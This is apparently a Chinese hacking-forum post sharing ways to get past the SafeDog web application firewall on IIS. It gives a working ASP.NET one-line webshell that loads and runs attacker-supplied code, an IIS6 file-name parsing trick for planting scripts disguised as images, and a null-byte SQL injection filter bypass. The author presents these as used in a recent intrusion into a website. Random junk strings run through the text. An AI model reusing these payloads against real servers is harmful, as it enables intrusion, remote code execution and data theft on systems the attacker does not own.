1、绕过IIS安全狗的一句话。2 l( l# I8 I+ M( [; k7 h
前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。' R* p% R. C) Y* x* o3 A' m
<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。
( B6 `+ k' `6 W n8 k' W: J
: _3 {, t! \1 W2 ~7 }3 k2、IIS6.0解析漏洞遇到安全狗。0 f+ X0 i8 `; \5 ?/ K( {# O
文件名为
_4 y" o+ ~3 chttp://www.xxxxx.com/sh3llc0de.asp;1.jpg
& p* V I" }5 J' Z4 F0 u9 v: K9 \ B6 l) F3 M
这样的会被IIS安全狗果断屏蔽。 ^9 S# d8 ]. H1 ?: q* P5 v' V
改成如下名称,IIS6一样会解析:, ?0 t: [% \# G/ H) R
www.xxxxx.com/;1.asp;1.jpg
: I( t9 ]6 S, v" o! F; m# E* _+ v) r8 V; ~# u4 u3 W6 x, `
3、安全狗的注入绕过。2 _) ~( j6 J8 k, a( f7 Y& W
常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。" m. D0 r- R- q; n* K
但如果:5 D3 D, p* v- b2 r$ P; {2 F2 N$ J
r00ts.asp?r00ts.com=%00.&id=69%20 and 1=1
. e& x$ `4 l3 G4 O) ?就可以成功绕过了。9 R) w* O. w$ N9 }( W" b. o7 C
! X) P+ C" `4 U/ I' {, \$ M+ c
! ^/ ~3 p D3 a; C5 K! f7 o( [0 t
|